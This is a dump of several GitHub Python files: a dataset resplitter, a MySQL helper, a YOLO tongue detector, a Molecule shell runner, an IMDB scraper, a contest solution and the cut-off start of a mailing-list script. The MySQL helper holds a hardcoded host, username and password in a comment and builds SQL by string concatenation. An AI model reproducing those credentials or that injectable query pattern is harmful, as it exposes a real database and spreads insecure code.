0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "tree.TreeNode", "line_number": 11, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 11, "usage_type": "name"}]} +{"seq_id": "7283432142", "text": "import collections\nimport warnings\nfrom functools import reduce\nfrom typing import Dict, List, Tuple\n\nimport datasets\nfrom datasets import Dataset, DatasetDict\n\n\nclass MergeResplitter:\n \"\"\"Merge existing splits of the dataset and assign them custom names.\n\n Create new `DatasetDict` with new split names corresponding to the merged existing\n splits (e.g. \"train\", \"valid\" and \"test\").\n\n Parameters\n ----------\n merge_config: Dict[str, Tuple[str, ...]]\n Dictionary with keys - the desired split names to values - tuples of the current\n split names that will be merged together\n\n Examples\n --------\n Create new `DatasetDict` with a split name \"new_train\" that is created as a merger\n of the \"train\" and \"valid\" splits. 
Keep the \"test\" split.\n\n >>> # Assuming there is a dataset_dict of type `DatasetDict`\n >>> # dataset_dict is {\"train\": train-data, \"valid\": valid-data, \"test\": test-data}\n >>> merge_resplitter = MergeResplitter(\n >>> merge_config={\n >>> \"new_train\": (\"train\", \"valid\"),\n >>> \"test\": (\"test\", )\n >>> }\n >>> )\n >>> new_dataset_dict = merge_resplitter(dataset_dict)\n >>> # new_dataset_dict is\n >>> # {\"new_train\": concatenation of train-data and valid-data, \"test\": test-data}\n \"\"\"\n\n def __init__(\n self,\n merge_config: Dict[str, Tuple[str, ...]],\n ) -> None:\n self._merge_config: Dict[str, Tuple[str, ...]] = merge_config\n self._check_duplicate_merge_splits()\n\n def __call__(self, dataset: DatasetDict) -> DatasetDict:\n \"\"\"Resplit the dataset according to the `merge_config`.\"\"\"\n self._check_correct_keys_in_merge_config(dataset)\n return self.resplit(dataset)\n\n def resplit(self, dataset: DatasetDict) -> DatasetDict:\n \"\"\"Resplit the dataset according to the `merge_config`.\"\"\"\n resplit_dataset = {}\n for divide_to, divided_from__list in self._merge_config.items():\n datasets_from_list: List[Dataset] = []\n for divide_from in divided_from__list:\n datasets_from_list.append(dataset[divide_from])\n if len(datasets_from_list) > 1:\n resplit_dataset[divide_to] = datasets.concatenate_datasets(\n datasets_from_list\n )\n else:\n resplit_dataset[divide_to] = datasets_from_list[0]\n return datasets.DatasetDict(resplit_dataset)\n\n def _check_correct_keys_in_merge_config(self, dataset: DatasetDict) -> None:\n \"\"\"Check if the keys in merge_config are existing dataset splits.\"\"\"\n dataset_keys = dataset.keys()\n specified_dataset_keys = self._merge_config.values()\n for key_list in specified_dataset_keys:\n for key in key_list:\n if key not in dataset_keys:\n raise ValueError(\n f\"The given dataset key '{key}' is not present in the given \"\n f\"dataset object. Make sure to use only the keywords that are \"\n f\"available in your dataset.\"\n )\n\n def _check_duplicate_merge_splits(self) -> None:\n \"\"\"Check if the original splits are duplicated for new splits creation.\"\"\"\n merge_splits = reduce(lambda x, y: x + y, self._merge_config.values())\n duplicates = [\n item\n for item, count in collections.Counter(merge_splits).items()\n if count > 1\n ]\n if duplicates:\n warnings.warn(\n f\"More than one desired splits used '{duplicates[0]}' in \"\n f\"`merge_config`. 
Make sure that is the intended behavior.\",\n stacklevel=1,\n )\n", "repo_name": "adap/flower", "sub_path": "datasets/flwr_datasets/merge_resplitter.py", "file_name": "merge_resplitter.py", "file_ext": "py", "file_size_in_byte": 3729, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3287, "dataset": "github-code", "pt": "61", "api": [{"api_name": "typing.Dict", "line_number": 42, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 42, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 44, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 44, "usage_type": "name"}, {"api_name": "datasets.DatasetDict", "line_number": 47, "usage_type": "name"}, {"api_name": "datasets.DatasetDict", "line_number": 52, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 56, "usage_type": "name"}, {"api_name": "datasets.Dataset", "line_number": 56, "usage_type": "name"}, {"api_name": "datasets.concatenate_datasets", "line_number": 60, "usage_type": "call"}, {"api_name": "datasets.DatasetDict", "line_number": 65, "usage_type": "call"}, {"api_name": "datasets.DatasetDict", "line_number": 67, "usage_type": "name"}, {"api_name": "functools.reduce", "line_number": 82, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 85, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 89, "usage_type": "call"}]} +{"seq_id": "21297266903", "text": "import pandas as pd\nimport os\nimport sqlite3\nimport pyodbc\nimport mysql.connector #pip install mysql-connector-python\nimport MySQLdb\nfrom mysql import *\nfrom sqlalchemy import create_engine\nfrom sqlalchemy import update\nfrom pypika import Query, Table, Field\n\ndef MySql_1(hPort,user,pas,db):\n conn_str = 'mysql+mysqlconnector://' + user + ':' + pas + '@' + hPort + '/' + db\n engine = create_engine(conn_str, echo=False)\n conn = engine.raw_connection()\n return conn\n\ndef MySql_3(host_name, user_name, user_password,db):\n conn = MySQLdb.connect(host_name,user_name,user_password,db)\n return conn\n\n\nclass prep_query:\n def __init__(self, tablename):\n self.cols = \"*\"\n self.tbl = tablename\n self.qry = \"\"\n def q_select(self, cond = False, cols=False):\n if cols == False and cond != False:\n self.qry = \"select \" + self.cols + \" from \" + self.tbl + \" where \" + cond\n elif cols != False and cond != False:\n self.qry = \"select \" + cols + \" from \" + self.tbl + \" where \" + cond\n elif cols != False and cond == False:\n self.qry = \"select \" + cols + \" from \" + self.tbl\n elif cols == False and cond == False:\n self.qry = \"select \" + self.cols + \" from \" + self.tbl\n def q_delete(self, cols , value):\n self.qry = \"DELETE FROM \" + self.tbl + \" WHERE \" + cols + \"='\" + value + \"'\"\n def q_insert(self, cols, values):\n self.qry = \"insert into \" + self.tbl + \" (\" + cols + \") values (\" + values + \")\"\n def q_update(self, cols, values, ref, refvalue):\n self.qry = \"UPDATE \" + self.tbl + \" SET \" + cols + \"='\" + values + \"' WHERE \" + ref + \"='\" + refvalue + \"'\"\n def get(self):\n return self.qry\n\n\n#x = prep_query(\"omtb\")\n##x.q_select()\n#print(x.get())\n#print(x.q_sel(\"asn = '123' and gsn = '5'\", \"col1, col2\"))\n\n\n\ndef prep_qry(tbl, cond, column = False, vals = False):\n if column == False:\n cols = \"*\"\n else:\n cols = column\n #s_select = 'select ' + col + ' from ' + tbl + ' where ' + cond\n #s_update = 'update from ' + tbl + ' from ' + tbl + ' where ' cond\n #s_insert = \"insert into \" + tbl + \" (\" + 
col + \") values (\" + values + \")\"\n #qry = \"UPDATE \" + tbl + \" SET \" + col + \"='\" + values + \"' WHERE \" + ref + \"='\" + refvalue + \"'\"\n\n\nclass oMySql:\n def __init__(self, connection, tablename):\n self.conn = connection\n self.cr = connection.cursor()\n self.tbl = tablename\n def q_row_count(self):\n sql = \"select * from \" + self.tbl\n df = pd.read_sql(sql, self.conn)\n print(sql,'-' , df.shape[0])\n def q_fetch_all_row(self):\n sql = 'select * from ' + self.tbl\n self.cr.execute(sql)\n rs = self.cr.fetchall()\n ls = []\n for r in rs:\n ls1 = list(r)\n ls.append(ls1)\n print(ls)\n\n\n#q = Query.from_('asdb').select('id', 'fname', 'lname', 'phone')\n#Query.from_('asdb').select('id', 'fname', 'lname', 'phone').orderby('id', order=Order.desc)\n\n\n#cn = MySql_1('38.70.234.101','akomi','1q2w3eaz$','omdb')\n#x = oMySql(cn,'live')\n#x.q_fetch_all_row()\n", "repo_name": "FuckBrains/omEngin", "sub_path": "Z_ALL_FILE/Py/omdb.py", "file_name": "omdb.py", "file_ext": "py", "file_size_in_byte": 3116, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "sqlalchemy.create_engine", "line_number": 14, "usage_type": "call"}, {"api_name": "MySQLdb.connect", "line_number": 19, "usage_type": "call"}, {"api_name": "pandas.read_sql", "line_number": 72, "usage_type": "call"}]} +{"seq_id": "10841686067", "text": "# -------------------------------------#\n# 创建YOLO类\n# 检测有无符合要求的舌头图片,如果有裁剪下来,返回True,如果没有返回False(前端可以提示靠近点或者咋的~)\n# -------------------------------------#\nimport colorsys\nimport os\nimport time\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom PIL import Image, ImageDraw, ImageFont\n\nfrom algorithm.yolov3.nets.yolo3 import YoloBody\nfrom algorithm.yolov3.utils.utils import (DecodeBox, letterbox_image, non_max_suppression,\n yolo_correct_boxes)\n\nprint(torch.__version__)\nprint(torch.cuda.is_available())\n\n# --------------------------------------------#\n# 使用自己训练好的模型预测需要修改2个参数\n# model_path和classes_path都需要修改!\n# 如果出现shape不匹配,一定要注意\n# 训练时的model_path和classes_path参数的修改\n# --------------------------------------------#\nclass YOLO(object):\n _defaults = {\n # 修改模型路径和分类类别\n # \"model_path\": './yolov3_tongue.pth',\n # \"anchors_path\": './model_data/yolo_anchors.txt',\n # \"classes_path\": './model_data/voc_classes.txt',\n \"model_path\": os.path.join(os.getcwd(), \"algorithm\", \"yolov3\", \"yolov3_tongue.pth\"),\n \"anchors_path\": os.path.join(os.getcwd(), \"algorithm\", \"yolov3\", \"model_data\", \"yolo_anchors.txt\"),\n \"classes_path\": os.path.join(os.getcwd(), \"algorithm\", \"yolov3\", \"model_data\", \"voc_classes.txt\"),\n \"model_image_size\": (416, 416, 3),\n \"confidence\": 0.5,\n \"iou\": 0.3,\n \"cuda\": False,\n # ---------------------------------------------------------------------#\n # 该变量用于控制是否使用letterbox_image对输入图像进行不失真的resize,\n # 在多次测试后,发现关闭letterbox_image直接resize的效果更好\n # ---------------------------------------------------------------------#\n \"letterbox_image\": False,\n }\n\n @classmethod\n def get_defaults(cls, n):\n if n in cls._defaults:\n return cls._defaults[n]\n else:\n return \"Unrecognized attribute name '\" + n + \"'\"\n\n # ---------------------------------------------------#\n # 初始化YOLO\n # ---------------------------------------------------#\n def __init__(self, **kwargs):\n self.__dict__.update(self._defaults)\n self.class_names = self._get_class()\n self.anchors = self._get_anchors()\n self.generate()\n\n # 
---------------------------------------------------#\n # 获得所有的分类\n # ---------------------------------------------------#\n def _get_class(self):\n classes_path = os.path.expanduser(self.classes_path)\n with open(classes_path) as f:\n class_names = f.readlines()\n class_names = [c.strip() for c in class_names]\n return class_names\n\n # ---------------------------------------------------#\n # 获得所有的先验框\n # ---------------------------------------------------#\n def _get_anchors(self):\n anchors_path = os.path.expanduser(self.anchors_path)\n with open(anchors_path) as f:\n anchors = f.readline()\n anchors = [float(x) for x in anchors.split(',')]\n return np.array(anchors).reshape([-1, 3, 2])[::-1, :, :]\n\n # ---------------------------------------------------#\n # 生成模型\n # ---------------------------------------------------#\n def generate(self):\n self.num_classes = len(self.class_names)\n # ---------------------------------------------------#\n # 建立yolov3模型\n # ---------------------------------------------------#\n self.net = YoloBody(self.anchors, self.num_classes)\n\n # ---------------------------------------------------#\n # 载入yolov3模型的权重\n # ---------------------------------------------------#\n print('Loading weights into state dict...')\n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n state_dict = torch.load(self.model_path, map_location=device)\n self.net.load_state_dict(state_dict)\n self.net = self.net.eval()\n\n if self.cuda:\n self.net = nn.DataParallel(self.net)\n self.net = self.net.cuda()\n\n # ---------------------------------------------------#\n # 建立三个特征层解码用的工具\n # ---------------------------------------------------#\n self.yolo_decodes = []\n for i in range(3):\n self.yolo_decodes.append(\n DecodeBox(self.anchors[i], self.num_classes, (self.model_image_size[1], self.model_image_size[0])))\n\n print('{} model, anchors, and classes loaded.'.format(self.model_path))\n # 画框设置不同的颜色\n hsv_tuples = [(x / len(self.class_names), 1., 1.)\n for x in range(len(self.class_names))]\n self.colors = list(map(lambda x: colorsys.hsv_to_rgb(*x), hsv_tuples))\n self.colors = list(\n map(lambda x: (int(x[0] * 255), int(x[1] * 255), int(x[2] * 255)),\n self.colors))\n\n # ---------------------------------------------------#\n # 检测图片\n # ---------------------------------------------------#\n def detect_image(self, input_path,out_path):\n (_,filename) = os.path.split(input_path)\n filename = filename.split('.')[0]\n\n image = Image.open(input_path)\n\n # ---------------------------------------------------------#\n # 在这里将图像转换成RGB图像,防止灰度图在预测时报错。\n # ---------------------------------------------------------#\n image = image.convert('RGB')\n\n image_shape = np.array(np.shape(image)[0:2])\n # ---------------------------------------------------------#\n # 给图像增加灰条,实现不失真的resize\n # 也可以直接resize进行识别\n # ---------------------------------------------------------#\n if self.letterbox_image:\n crop_img = np.array(letterbox_image(image, (self.model_image_size[1], self.model_image_size[0])))\n else:\n crop_img = image.resize((self.model_image_size[1], self.model_image_size[0]), Image.BICUBIC)\n\n photo = np.array(crop_img, dtype=np.float32) / 255.0\n photo = np.transpose(photo, (2, 0, 1))\n # ---------------------------------------------------------#\n # 添加上batch_size维度\n # ---------------------------------------------------------#\n images = [photo]\n\n with torch.no_grad():\n images = torch.from_numpy(np.asarray(images))\n if self.cuda:\n images = images.cuda()\n\n # 
---------------------------------------------------------#\n # 将图像输入网络当中进行预测!\n # ---------------------------------------------------------#\n outputs = self.net(images)\n output_list = []\n for i in range(3):\n output_list.append(self.yolo_decodes[i](outputs[i]))\n\n # ---------------------------------------------------------#\n # 将预测框进行堆叠,然后进行非极大抑制\n # ---------------------------------------------------------#\n output = torch.cat(output_list, 1)\n batch_detections = non_max_suppression(output, self.num_classes, conf_thres=self.confidence,\n nms_thres=self.iou)\n\n # ---------------------------------------------------------#\n # 如果没有检测出物体,返回原图\n # ---------------------------------------------------------#\n try:\n batch_detections = batch_detections[0].cpu().numpy()\n except:\n return input_path,False\n\n # ---------------------------------------------------------#\n # 对预测框进行得分筛选\n # ---------------------------------------------------------#\n top_index = batch_detections[:, 4] * batch_detections[:, 5] > self.confidence\n top_conf = batch_detections[top_index, 4] * batch_detections[top_index, 5]\n top_label = np.array(batch_detections[top_index, -1], np.int32)\n top_bboxes = np.array(batch_detections[top_index, :4])\n top_xmin, top_ymin, top_xmax, top_ymax = np.expand_dims(top_bboxes[:, 0], -1), np.expand_dims(\n top_bboxes[:, 1], -1), np.expand_dims(top_bboxes[:, 2], -1), np.expand_dims(top_bboxes[:, 3], -1)\n\n # -----------------------------------------------------------------#\n # 在图像传入网络预测前会进行letterbox_image给图像周围添加灰条\n # 因此生成的top_bboxes是相对于有灰条的图像的\n # 我们需要对其进行修改,去除灰条的部分。\n # -----------------------------------------------------------------#\n if self.letterbox_image:\n boxes = yolo_correct_boxes(top_ymin, top_xmin, top_ymax, top_xmax,\n np.array([self.model_image_size[0], self.model_image_size[1]]), image_shape)\n else:\n top_xmin = top_xmin / self.model_image_size[1] * image_shape[1]\n top_ymin = top_ymin / self.model_image_size[0] * image_shape[0]\n top_xmax = top_xmax / self.model_image_size[1] * image_shape[1]\n top_ymax = top_ymax / self.model_image_size[0] * image_shape[0]\n boxes = np.concatenate([top_ymin, top_xmin, top_ymax, top_xmax], axis=-1)\n\n # 保存分割出目标检测出的图片\n boxes_crop = boxes[:, [1, 0, 3, 2]]\n # dirs = 'img/out/'\n if not os.path.exists(out_path):\n os.makedirs(out_path)\n out_path = out_path + '/' + filename + '_crop_out.bmp'\n image.crop(boxes_crop[0, :]).save(out_path)\n return out_path,True\n\n", "repo_name": "WeiMin-Li-visual/tradmedical", "sub_path": "algorithm/yolov3/yolo_tongue.py", "file_name": "yolo_tongue.py", "file_ext": "py", "file_size_in_byte": 10156, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "61", "api": [{"api_name": "torch.__version__", "line_number": 18, "usage_type": "attribute"}, {"api_name": "torch.cuda.is_available", "line_number": 19, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 19, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 33, "usage_type": "call"}, {"api_name": "os.path", "line_number": 33, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 33, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 34, "usage_type": "call"}, {"api_name": "os.path", "line_number": 34, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 34, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path", "line_number": 35, "usage_type": 
"attribute"}, {"api_name": "os.getcwd", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path.expanduser", "line_number": 67, "usage_type": "call"}, {"api_name": "os.path", "line_number": 67, "usage_type": "attribute"}, {"api_name": "os.path.expanduser", "line_number": 77, "usage_type": "call"}, {"api_name": "os.path", "line_number": 77, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 81, "usage_type": "call"}, {"api_name": "algorithm.yolov3.nets.yolo3.YoloBody", "line_number": 91, "usage_type": "call"}, {"api_name": "torch.device", "line_number": 97, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 97, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 97, "usage_type": "attribute"}, {"api_name": "torch.load", "line_number": 98, "usage_type": "call"}, {"api_name": "torch.nn.DataParallel", "line_number": 103, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 103, "usage_type": "name"}, {"api_name": "algorithm.yolov3.utils.utils.DecodeBox", "line_number": 112, "usage_type": "call"}, {"api_name": "colorsys.hsv_to_rgb", "line_number": 118, "usage_type": "call"}, {"api_name": "os.path.split", "line_number": 127, "usage_type": "call"}, {"api_name": "os.path", "line_number": 127, "usage_type": "attribute"}, {"api_name": "PIL.Image.open", "line_number": 130, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 130, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 137, "usage_type": "call"}, {"api_name": "numpy.shape", "line_number": 137, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 143, "usage_type": "call"}, {"api_name": "algorithm.yolov3.utils.utils.letterbox_image", "line_number": 143, "usage_type": "call"}, {"api_name": "PIL.Image.BICUBIC", "line_number": 145, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 145, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 147, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 147, "usage_type": "attribute"}, {"api_name": "numpy.transpose", "line_number": 148, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 154, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 155, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 155, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 170, "usage_type": "call"}, {"api_name": "algorithm.yolov3.utils.utils.non_max_suppression", "line_number": 171, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 187, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 187, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 188, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 189, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 190, "usage_type": "call"}, {"api_name": "algorithm.yolov3.utils.utils.yolo_correct_boxes", "line_number": 198, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 199, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 205, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 210, "usage_type": "call"}, {"api_name": "os.path", "line_number": 210, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 211, "usage_type": "call"}]} +{"seq_id": "29384195011", "text": "import os\n\nimport sh\n\nfrom molecule import logger\nfrom molecule import util\nfrom molecule.dependency import base\n\nLOG = 
logger.get_logger(__name__)\n\n\nclass Shell(base.Base):\n \"\"\"\n `Shell` is an alternate dependency manager. It is intended to run a\n command in situations where `Ansible Galaxy`_ and `Gilt`_ don't suffice.\n\n The `command` to execute is required, and is relative to Molecule's project\n directory when referencing a script not in $PATH.\n\n .. note::\n\n Unlike the other dependency managers, `options` are ignored and not\n passed to `shell`. Additional flags/subcommands should simply be added\n to the `command`.\n\n .. code-block:: yaml\n\n dependency:\n name: shell\n command: path/to/command --flag1 subcommand --flag2\n\n The dependency manager can be disabled by setting `enabled` to False.\n\n .. code-block:: yaml\n\n dependency:\n name: shell\n command: path/to/command --flag1 subcommand --flag2\n enabled: False\n\n Environment variables can be passed to the dependency.\n\n .. code-block:: yaml\n\n dependency:\n name: shell\n command: path/to/command --flag1 subcommand --flag2\n env:\n FOO: bar\n \"\"\"\n\n def __init__(self, config):\n super(Shell, self).__init__(config)\n self._sh_command = None\n\n # self.command = config..config['dependency']['command']\n\n @property\n def command(self):\n return self._config.config['dependency']['command']\n\n @property\n def default_options(self):\n return {}\n\n @property\n def default_env(self):\n return util.merge_dicts(os.environ.copy(), self._config.env)\n\n def bake(self):\n \"\"\"\n Bake a `shell` command so it's ready to execute and returns None.\n\n :return: None\n \"\"\"\n command_list = self.command.split(' ')\n command, args = command_list[0], command_list[1:]\n\n self._sh_command = getattr(sh, command)\n # Reconstruct command with remaining args.\n self._sh_command = self._sh_command.bake(\n args, _env=self.env, _out=LOG.out, _err=LOG.error)\n\n def execute(self):\n if not self.enabled:\n msg = 'Skipping, dependency is disabled.'\n LOG.warn(msg)\n return\n\n if self._sh_command is None:\n self.bake()\n\n try:\n util.run_command(self._sh_command, debug=self._config.debug)\n msg = 'Dependency completed successfully.'\n LOG.success(msg)\n except sh.ErrorReturnCode as e:\n util.sysexit(e.exit_code)\n\n def _has_command_configured(self):\n return 'command' in self._config.config['dependency']\n", "repo_name": "amitvashist7/ansible-development-CTS", "sub_path": "molecule/my_env/lib/python2.7/site-packages/molecule/dependency/shell.py", "file_name": "shell.py", "file_ext": "py", "file_size_in_byte": 2735, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "61", "api": [{"api_name": "molecule.logger.get_logger", "line_number": 9, "usage_type": "call"}, {"api_name": "molecule.logger", "line_number": 9, "usage_type": "name"}, {"api_name": "molecule.dependency.base.Base", "line_number": 12, "usage_type": "attribute"}, {"api_name": "molecule.dependency.base", "line_number": 12, "usage_type": "name"}, {"api_name": "molecule.util.merge_dicts", "line_number": 68, "usage_type": "call"}, {"api_name": "molecule.util", "line_number": 68, "usage_type": "name"}, {"api_name": "os.environ.copy", "line_number": 68, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 68, "usage_type": "attribute"}, {"api_name": "molecule.util.run_command", "line_number": 94, "usage_type": "call"}, {"api_name": "molecule.util", "line_number": 94, "usage_type": "name"}, {"api_name": "sh.ErrorReturnCode", "line_number": 97, "usage_type": "attribute"}, {"api_name": "molecule.util.sysexit", "line_number": 98, 
"usage_type": "call"}, {"api_name": "molecule.util", "line_number": 98, "usage_type": "name"}]} +{"seq_id": "21567033546", "text": "from scrapy.spider import BaseSpider\nfrom scrapy.selector import HtmlXPathSelector\nfrom imdb_scrape.items import ImdbScrapeItem\nfrom scrapy.http.request import Request\n\nimport csv\n\nclass MySpider(BaseSpider):\n name = \"imdb\"\n allowed_domains = [\"imdb.com\"]\n #start_urls = [\"http://www.imdb.com/title/tt0109950/?ref_=fn_al_tt_1\"]\n #start_urls = [\"http://www.imdb.com/find?ref_=nv_sr_fn&q=/Toy Story (1995)\"]\n #lines=[]\n movies=[]\n text_file = open(\"movies.dat\", \"r\")\n lines = text_file.read().split('\\n')\n l=[]\n for line in lines:\n line = line.split(\"::\")\n l.append(line)\n #with open('Test.dat','r') as f:\n # reader=csv.reader(f,delimiter=\":\")\n # for line in reader:\n # lines.append([l for l in line if l.strip() != ''])\n l = l[:3883]\n for line in l:\n movies.append(line[1])\n urls = []\n for movie in movies:\n urls.append(\"http://www.imdb.com/find?ref_=nv_sr_fn&q=/\" + movie)\n start_urls = urls \n \n def parse(self, response):\n hxs = HtmlXPathSelector(response)\n link = hxs.select(\"//div[@class='findSection']/table[@class='findList']/tr/td/a/@href\").extract()[0]\n link = \"http://www.imdb.com\" + link\n yield Request(link, callback=self.parse_movies)\n \n def parse_movies(self, response):\n hxs = HtmlXPathSelector(response)\n rating = hxs.select(\"//span[@itemprop='ratingValue']/text()\").extract()[0]\n cast = hxs.select('//table[@class=\"cast_list\"]/tr/td[@itemprop=\"actor\"]//text()').extract()\n cast = filter(None, self.trim_list(cast))\n director = hxs.select('//span[@itemprop=\"director\"]/a/span[@itemprop=\"name\"]/text()').extract()\n director = self.trim_list(director)\n movie_name = hxs.select('//div[@class=\"title_wrapper\"]/h1[@itemprop=\"name\"]/text()').extract()\n movie_name = filter(None, self.trim_list(movie_name))\n year = hxs.select('//span[@id=\"titleYear\"]/a/text()').extract()\n year = self.trim_list(year)\n #print movie_name, year, rating, director, cast\n item = ImdbScrapeItem()\n item['movie_name'] = movie_name\n item['year'] = year\n item['rating'] = rating\n item['director'] = director\n item['cast'] = cast\n return item\n \n def trim(self, raw_str):\n \"\"\"\n Removes unicode strings from given string. Utility function\n being invoked by multiple functions. Returned value has also\n been stripped.\n \"\"\"\n return raw_str.encode('ascii', errors='ignore').strip()\n\n def trim_list(self, raw_list):\n \"\"\"\n Given a list containing strings that have unicode parts, it\n returns a list having no unicode strings. 
List items have\n also been stripped.\n \"\"\"\n return [self.trim(raw_str) for raw_str in raw_list] \n\n def get_urls():\n lines=[]\n movies=[]\n with open('Movies.dat','r') as f:\n reader=csv.reader(f,delimiter=\":\")\n for line in reader:\n lines.append([l for l in line if l.strip() != ''])\n for line in lines:\n movies.append(line[1])\n urls = []\n for movie in movies:\n urls.append(\"http://www.imdb.com/find?ref_=nv_sr_fn&q=/\" + movie)\n return urls ", "repo_name": "erwenzhang/Recommender_System", "sub_path": "imdb_scrape/imdb_scrape/spiders/test.py", "file_name": "test.py", "file_ext": "py", "file_size_in_byte": 3324, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "scrapy.spider.BaseSpider", "line_number": 8, "usage_type": "name"}, {"api_name": "scrapy.selector.HtmlXPathSelector", "line_number": 34, "usage_type": "call"}, {"api_name": "scrapy.http.request.Request", "line_number": 37, "usage_type": "call"}, {"api_name": "scrapy.selector.HtmlXPathSelector", "line_number": 40, "usage_type": "call"}, {"api_name": "imdb_scrape.items.ImdbScrapeItem", "line_number": 51, "usage_type": "call"}, {"api_name": "csv.reader", "line_number": 79, "usage_type": "call"}]} +{"seq_id": "23535696661", "text": "# -*- coding: utf-8 -*-\n# 3.0\n\n# \n\nimport sys\nimport numpy as np\nfrom collections import Counter\nimport string\n\ndef solve_case(num, cnts):\n counter = Counter()\n alph = list(string.ascii_uppercase)\n tot = 0\n ret = \"\"\n num_parties = num\n for i, cnt in enumerate(cnts.split(\" \")):\n counter[alph[i]] = int(cnt)\n tot += int(cnt)\n \n while tot > 3:\n party, p_cnt = counter.most_common(2)[0]\n party2, p_cnt2 = counter.most_common(2)[1]\n if p_cnt > p_cnt2:\n ret += party+party + \" \"\n counter[party] -= 2\n else:\n ret += party + party2 + \" \"\n counter[party] -= 1\n counter[party2] -= 1\n tot -= 2\n \n if tot == 3:\n party, _ = counter.most_common(1)[0]\n ret += party + \" \"\n counter[party] -= 1\n tot -= 1\n if tot == 2:\n party, p_cnt = counter.most_common(2)[0]\n party2, p_cnt2 = counter.most_common(2)[1]\n ret += party + party2\n tot -= 2\n assert tot == 0\n return ret\n\nnum_cases = int(sys.stdin.readline())\nfor n in range(1, num_cases + 1):\n num_parties = int(sys.stdin.readline())\n counts = sys.stdin.readline()\n print(\"Case #{0}: {1}\".format(n, solve_case(num_parties, counts)) )\n", "repo_name": "dr-dos-ok/Code_Jam_Webscraper", "sub_path": "solutions_python/Problem_187/716.py", "file_name": "716.py", "file_ext": "py", "file_size_in_byte": 1304, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "collections.Counter", "line_number": 12, "usage_type": "call"}, {"api_name": "string.ascii_uppercase", "line_number": 13, "usage_type": "attribute"}, {"api_name": "sys.stdin.readline", "line_number": 46, "usage_type": "call"}, {"api_name": "sys.stdin", "line_number": 46, "usage_type": "attribute"}, {"api_name": "sys.stdin.readline", "line_number": 48, "usage_type": "call"}, {"api_name": "sys.stdin", "line_number": 48, "usage_type": "attribute"}, {"api_name": "sys.stdin.readline", "line_number": 49, "usage_type": "call"}, {"api_name": "sys.stdin", "line_number": 49, "usage_type": "attribute"}]} +{"seq_id": "16419253117", "text": "#!/usr/bin/env python\n\nimport glob\nimport json\nimport logging\nimport os\nimport tempfile\nimport subprocess\nimport string\nimport sys\n\n# include common path 
variables\nexecfile(\"common.conf\")\n\nfrom collections import namedtuple\nEntry = namedtuple('Entry', 'listkey availid listaddr')\n\nPROGNAME = os.path.basename(sys.argv[0])\nlogging.getLogger().name = sys.argv[0]\n\nSVN_CONFIG_DIR = 'APMAIL_HOME/.subversion2'\n\nBASEDIR = 'APMAIL_HOME/lists'\n\nclass Hooks:\n @staticmethod\n def welcome(entry):\n listkey, availid = entry.listkey, entry.availid\n if 'security' not in listkey and 'trademarks' not in listkey:\n return # DECLINED\n try:\n stdin = tempfile.SpooledTemporaryFile()\n if op == 'sub':\n stdin.write('Welcome %s@!\\n'\n '\\n'\n 'You are now subscribed to the privately-archived %s@ mailing list!\\n'\n % (availid, listkey))\n else:\n stdin.write('Welcome %s@!\\n'\n '\\n'\n 'You are now unsubscribed from the privately-archived %s@ mailing list!\\n'\n % (availid, listkey))\n stdin.flush()\n stdin.seek(0)\n subprocess.check_call(['mail', '-s', \"Welcome %s@!\" % availid,\n entry.listaddr],\n stdin=stdin)\n except Exception as e:\n logging.warn('%s: %s', type(e).__name__, e)\n\nHOOKS = [\n # Hook functions should never raise; if they have a problem, they should\n # log it. They should return None.\n Hooks.welcome,\n]\n\nclass Skip(Exception):\n pass\n\ndef key2dir(listkey):\n # special processing for empire-db\n if listkey.startswith('empire-db-'):\n base = 'empire-db'\n else:\n base = listkey.split('-', 1)[0]\n tail = listkey[len(base)+1:]\n dirs = [\n 